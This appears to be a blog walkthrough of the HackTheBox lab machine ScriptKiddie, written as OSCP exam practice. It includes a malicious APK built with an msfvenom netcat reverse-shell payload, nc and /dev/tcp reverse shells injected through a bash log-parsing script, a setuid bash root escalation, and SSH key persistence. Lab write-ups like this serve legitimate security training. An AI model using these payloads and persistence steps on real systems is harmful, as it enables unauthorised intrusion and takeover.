Road to OSCP 12: ScriptKiddie HackTheBox

8 min readMar 20, 2023


Follow along in my OSCP journey, this is my target 12 of the TJNULL’s OSCP list.

You’ll be allowed to say you’re a hacker after reading this blog

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!


I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/ -cs 25 -vv -o /home/kali/Documents/HTB/lab/


While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt

22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Aggressive OS guesses: Linux 2.6.32

This machine seems quite forward, there are 2 services, SSHand HTTP server. Let us see what they hold for us.

Web — 5000

I mean this type of page smells of command injection, let us see if that’s what we’ll find. It seems that we have 3 commands at our disposal to either scan, create payloads or find exploits.

Let’s be thorough. We first check the service version and any exploits against it.

We have Werkzeug httpd 0.16.1 which after running searchsploit against it we find:

Werkzeug - 'Debug Shell' Command Execution | exploits/multiple/remote/

But it requires the app to be running in debug mode which it isn’t.

Most likely a command injection but it turns out our expectations were a bit too high. All the injection characters seem to be filtered.

A couple of ideas come to mind: Since the payload generator is the only one that seems a bit more complex and has an upload function, we might be able to abuse it to either upload a reverse shell, generate a reverse shell that is stored on the device or use the template parameter. Let’s read the template documentation:

  1. Let’s try to use the filename of the template to exploit it

2. Generate a shell

We can see on the request if we click download that the payload is hosted on the server. These are really good news.

But we know from our scan that the server is a Linux machine, we’ll need a elf executable to make this work, however it seems like those don’t work …

Same if we try to upload the template, it’s an exe for windows and elf for linux so we can’t seem to upload what we want…


Ok so windows doesn’t work, linux doesn’t work … What are the options that we haven’t explored yet because they might not seems like they have a potential in the case we’re trying to break?






That android payload isn’t really something we have explored, as I don’t know much about APKs and how they could help, let’s do some research …

We had the right idea, just didn’t try the android payload generator

The exploit asks us a command we want to run then creates the malicious apk that we can upload to the server and that will run our command. Let’s test it out:

We upload it and setup a listener before running it of course:

We have RCE baby ❤ Let’s get ourselves a nice shell to work with, using something a mate showed me recently to get cmd reverse shells from msfvenom

sudo msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=5555 -f raw

We copy the line and create our APK

We upload it

And BIM we’re in 💪

We se that we are the user kid

Privilege Escalation

Time for some shell upgrade 😉

  1. We try both python and python3
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
  1. Ctrl+Z
  2. stty raw -echo
  3. fg (nothing will show on the screen, just type enter after the command a couple of times)

Let’s get the user flag

Now we have a proper shell

Improving our access

Let’s drop our public key in kid’s SSH authorized folder

  1. Copy the key
kali@kali:~/.ssh$ cat | xclip

2. Paste in the authorized file

cd /home/kid/.ssh
vi authorized_keys

SSH as kid

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

The only thing that seems to be interesting is the other user on the server:

Let’s explore that user pwn

We have some interesting folders and files but we don’t have permissions to execute them but at least we can read the



cd /home/pwn/
# get the ip from the hackers file and runs nmap on it
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &

# checks if the log file isn't empty, then cleans it up
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

If we look at the first line, cat $log | cut -d' ' -f3- | it captures the 3rd value separated by spaces, sorts them and finally proceeds to read the code as input for nmap.

We know we can’t mess with the IPs through the UI because there is some kind of sanitization that block characters we need. So we have to do it on the backend.

But how do we forge a reverse shell without spaces …

Being familiar with cut I am curious about the -f3- that last "-" isn't usually there, let's read some documentation:

So it picks up everything after, let’s test it out and prepare our payload.

test file

💪 The command actually picks everything after the 2nd space, let’s start crafting our payload:

#something something payload (with payload being an IP followed by a reverse shell
something something ; mkfifo /tmp/evzhy; nc 6666 0</tmp/evzhy | /bin/bash >/tmp/evzhy 2>&1; rm /tmp/evzhy

Now the issue we have is that we don’t really know how to run the script and we didnt’ find anything in the folder we have access to that could explain it. We do know that the script does a clean up at the end of it. Let’s see if it runs. We write anything into the log file and a couple of seconds later it’s empty, it seems the script runs periodically 🙌

We create a loop that injects our payload

while :; do echo "something something ; mkfifo /tmp/evzhy; nc 6666 0</tmp/evzhy | /bin/sh >/tmp/evzhy 2>&1; rm /tmp/evzhy" > hackers; done

And our listener comes back with a beautiful sight

Trying to get a stable shell we decide to change our payload to be able to upgrade it

while :; do echo "something something ; /bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' #" > hackers; done

Let’s TTY it (see the beginning of privilege escalation on how to do it)

Let’s check our quick wins and boom, we can run metasploit as root.

From here we can directly check the root flag:

Actually getting root

#inside metasploit
cp /bin/bash /tmp/bash && chmod +s /tmp/bash


/tmp/bash -p

Improving our root access

Drop your SSH public key into the authorized_keys file

echo "<>" > /root/.ssh/authorized_keys

Now we truly own the server

What did I learn?

  1. Understanding what runs behind an initial application to possibly find exploits within libraries or other apps it is using (msf exploit)
  2. Reading a bash script and finding a command injection within
  3. How to improve our access after we obtain a certain shell.


I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.




Written by Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together

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